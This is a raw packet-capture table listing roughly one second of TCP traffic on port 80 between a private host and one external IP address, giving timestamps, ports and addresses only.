Jan 7, 2025 10:09:03.882762909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882762909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882778883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882793903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882807016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882823944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882846117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882863045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882869959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882879019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882910013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882950068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.882953882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882966995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882980108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.882996082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883027077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883029938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.883054018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.883070946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.883075953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883088112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883097887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883138895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.883152008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.883184910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883197069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883208990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883219957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883233070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883254051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.883291960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.883295059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.883342028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.884938955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.884958029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.884969950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.884988070 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885010958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885014057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885024071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885025978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885039091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885068893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885075092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885075092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885081053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885092974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885102034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885149002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885186911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885199070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885229111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885241985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885245085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885257959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885268927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885278940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885302067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885310888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885310888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885317087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885329962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885338068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885340929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885373116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885399103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885399103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885411978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885435104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885447025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885457993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885459900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885459900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885471106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885482073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885488033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885488033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885493994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885505915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885521889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885551929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885600090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885611057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885615110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885636091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885649920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885658026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885662079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885674953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885694027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885731936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885760069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885782957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885796070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885812998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885823011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885833025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885834932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885848045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885860920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885867119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885883093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885885000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885896921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885910988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885927916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885941029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885946035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885946035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885960102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885963917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.885974884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885987043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.885998964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.886009932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.886018991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.886018991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.886034012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.886096001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.911875010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.911886930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.911897898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.911928892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.911938906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.911973000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.911973000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.911993980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912005901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912007093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.912018061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912040949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.912158012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912168980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912180901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912190914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912192106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.912206888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.912206888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912220955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.912241936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.912256002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.914175987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914186954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914203882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914216042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914227009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914242983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914246082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.914246082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.914254904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914288044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.914303064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.914303064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.914338112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.936433077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.936444998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.936455011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.936486006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.936515093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.936537981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.936553955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.936562061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.936579943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.936608076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.936667919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969111919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969131947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969150066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969161987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969172955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969192982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969208002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969253063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969253063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969260931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969271898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969283104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969299078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969307899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969311953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969331026 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969343901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969347000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969356060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969369888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969381094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969396114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969396114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969410896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969423056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969429016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969455004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969460011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969469070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969505072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969517946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969532967 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969544888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969552994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969566107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969583988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969592094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969594955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969607115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969615936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969619989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969635963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969662905 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969716072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969738007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969754934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969764948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969775915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969784021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969784021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969789982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969805002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969809055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969820976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969835997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969845057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969849110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.969857931 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969891071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.969891071 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971733093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971745014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971764088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971776009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971786976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971797943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971806049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971806049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971818924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971818924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971843958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971854925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971877098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971910000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971921921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971940041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971951008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971963882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971966982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.971981049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.971992970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972002983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972002983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972033978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972038984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972050905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972106934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972106934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972131968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972143888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972155094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972168922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972178936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972191095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972197056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972203970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972219944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972223997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972235918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972239017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972263098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972282887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972295046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972305059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972317934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972318888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972347021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972369909 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972487926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972498894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972511053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972521067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972532988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972537994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972553015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972557068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972568989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972579002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972588062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972589016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972603083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972611904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972614050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972628117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972641945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972680092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972709894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972727060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972738981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972748995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972759962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972764015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972771883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972784996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972784996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972800016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972810984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.972815990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972831011 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.972867012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998574972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998591900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998601913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998616934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998630047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998646975 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998653889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998658895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998671055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998693943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998723030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998759985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998776913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998810053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998827934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998838902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998847961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998859882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998869896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998889923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998889923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998904943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998905897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998945951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998970985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.998977900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.998987913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.999063969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.000945091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.000963926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.001002073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.001008034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.001013994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.001015902 CET	50017	80	192.168.2.4	31.41.244.11
